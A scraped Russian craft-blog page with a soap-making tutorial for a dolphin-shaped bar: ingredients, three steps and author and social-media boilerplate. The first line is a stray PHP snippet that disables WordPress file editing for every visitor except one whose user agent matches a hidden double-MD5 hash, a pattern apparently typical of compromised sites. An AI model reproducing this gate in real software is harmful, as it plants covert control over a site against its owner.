if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } Как сделать мыло в форме дельфинчика | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

Как сделать мыло в форме дельфинчика

Ароматное мыло в виде маленького дельфинчика никого не оставит равнодушным!

Пона­до­бят­ся:

  • Про­зрач­ная мыль­ная осно­ва (око­ло 80 г);
  • Мас­ла кален­ду­лы и череды;
  • Аро­ма­ти­за­тор «Ваниль»;
  • Синий кра­си­тель;
  • Спирт, фор­ма, стаканчик.
  1. Фор­му сма­зать рас­ти­тель­ным мас­лом. В ста­кан­чи­ке сме­шать по кап­ле аро­ма­ти­за­то­ра, кра­си­те­ля, масел. Мас­ло чере­ды обла­да­ет успо­ка­и­ва­ю­щим дей­стви­ем, а мас­ло кален­ду­лы эффек­тив­но при вос­па­ле­ни­ях на дет­ской коже.
    дельфин1
  2. Мыль­ную осно­ву рас­то­пить на водя­ной бане, доба­вить в ста­кан­чик, хоро­шо пере­ме­шать, сбрыз­нуть спир­том при обра­зо­ва­нии пузырьков.
  3. Фор­му уста­но­вить на поли­эти­ле­но­вый пакет, в нее вылить полу­чен­ную смесь. Дать застыть.
    дельфин2

 


И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!
Автор: Юлия

Обожаю в свободное время заниматься мыловарением. Уже съела на этом целую собаку! Вот теперь спешу поделиться с вами своими работами ;) Читайте все мои записи!